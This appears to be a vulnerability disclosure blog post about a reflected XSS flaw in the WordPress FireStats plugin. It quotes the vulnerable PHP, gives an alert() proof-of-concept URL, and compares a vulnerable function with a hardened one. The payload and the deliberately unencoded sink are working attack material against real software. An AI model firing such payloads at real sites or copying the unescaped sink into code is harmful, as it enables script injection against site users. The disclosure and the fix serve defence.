0day WordPress XSS in FireStats plugin
I found a remotely exploitable reflected cross-site scripting (XSS) vulnerability in the WordPress FireStats plugin.
There is a small if statement on the GET parameter fs_javascript in the file /wp-content/plugins/firestats-wordpress.php:
[php]
if (isset($_GET['fs_javascript']))
{
add_action('init','fs_resume_js_call');
}
[/php]
If the parameter is set, this hooks the function fs_resume_js_call onto WordPress's init action, so it runs on every request that carries fs_javascript. That function is defined in the same file, /wp-content/plugins/firestats-wordpress.php:
[php]
function fs_resume_js_call()
{
$path = fs_get_firestats_path();
$file = $_GET['fs_javascript'];
unset($_GET['fs_javascript']);
// security check
if (strpos($file,"..") !== false) die(".. is not allowed in fs_javascript");
$allowed_files = array
(
'php/ajax-handler.php',
'php/window-donation.php',
'css/base.css.php',
'js/page-settings.js.php',
'php/page-settings.php',
'js/page-wordpress-settings.js.php',
'php/page-wordpress-settings.php',
'js/page-database.js.php',
'php/page-database.php',
'js/page-users.js.php',
'css/page-users.css.php',
'php/page-users.php',
'js/page-sites.js.php',
'css/page-sites.css.php',
'php/page-sites.php',
'php/page-tools.php',
'php/window-add-excluded-url.php',
'php/window-add-excluded-ip.php',
'php/window-delete-site.php',
'php/window-new-edit-site.php',
'php/window-edit-user.php',
'php/window-delete-user.php',
'php/tools/system_test.php',
'js/firestats.js.php'
);
$found = false;
foreach ($allowed_files as $a)
{
if ($file == $a)
{
$found = true;
break;
}
}
if (!$found) die("$file is not allowed");
require_once("$path/$file");
die();
}
[/php]
The problem is the failure branch: when $file is not in the array of allowed files the script reaches die("$file is not allowed"), which writes $file into the response body without any encoding and then stops the page from loading any further. $file is fully user controlled, because earlier in the function it is assigned straight from the request ($file = $_GET['fs_javascript'];). The only filtering before that sink is the check for "..", and that check dies with a fixed string that does not include the input.
So a value for fs_javascript that carries client-side JavaScript but contains no ".." (otherwise the earlier check ends the request before the reflecting die() is reached) fails the allowlist comparison and is echoed straight back into the page, triggering the XSS. Because the callback is hooked on init, it runs before WordPress has sent any output, so the reflected string is the whole response body.
Here is the PoC:
[js]/wp-admin/index.php?fs_javascript=<script>alert(123)</script>[/js]
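To make the sink concrete, here is the reflecting branch reduced to a plain function next to a hardened version. This is an added example, not code from the FireStats plugin: the function names, the shortened allowlist and the return-a-string structure (instead of die()) are assumptions made so the two variants can be compared side by side.

```php
<?php
// Added example, not FireStats code. The allowlist is a shortened stand-in
// for the plugin's array; the function names and the return-a-string
// structure (instead of die()) are assumptions made for illustration.

$allowed_files = array(
    'php/ajax-handler.php',
    'js/firestats.js.php',
);

// Vulnerable: same logic as the plugin. On an allowlist miss the raw value
// of $file is interpolated into the response body, so any HTML or <script>
// in it is rendered by the browser.
function fs_resume_js_call_vulnerable($file, array $allowed_files)
{
    // The only filter before the sink. It returns a fixed string,
    // so payloads containing ".." are never reflected.
    if (strpos($file, '..') !== false) {
        return '.. is not allowed in fs_javascript';
    }
    $found = false;
    foreach ($allowed_files as $a) {
        if ($file == $a) {
            $found = true;
            break;
        }
    }
    if (!$found) {
        return "$file is not allowed";   // reflected XSS sink
    }
    return 'require_once: ' . $file;     // stand-in for the include
}

// Hardened: strict (type-safe) allowlist comparison, and the error message
// never contains the attacker-controlled value. is_string() also rejects
// fs_javascript[]=... array input, which the original would try to compare.
function fs_resume_js_call_hardened($file, array $allowed_files)
{
    if (!is_string($file) || !in_array($file, $allowed_files, true)) {
        return 'fs_javascript value is not allowed';
    }
    return 'require_once: ' . $file;
}

// If the value really must be shown to the user, encode it for the HTML
// context instead of returning it raw.
function html_escape($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

$payload = '<script>alert(123)</script>';   // the PoC value, minus URL encoding

echo fs_resume_js_call_vulnerable($payload, $allowed_files), "\n";
echo fs_resume_js_call_hardened($payload, $allowed_files), "\n";
echo html_escape($payload) . ' is not allowed', "\n";
echo fs_resume_js_call_hardened('js/firestats.js.php', $allowed_files), "\n";
```

Run it with the php command line binary: the first line shows the script tag coming back verbatim inside the error message, the second shows the fixed message that never contains the input, the third shows what the value looks like once it is entity-encoded for an HTML context, and the last shows that an allowlisted file still passes the strict check.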

Hello, I am Jelmer, born in 1991. I have been playing in IT security for over half my age; I am not sure when, how and why it started, but I like it. I met Fredrik and Mathias through the internet. This is my Twitter account, feel free to follow me. You can contact me via email at jelmerdehen [ at ] hotmail [d0t] com, or you can chat with me on IRC.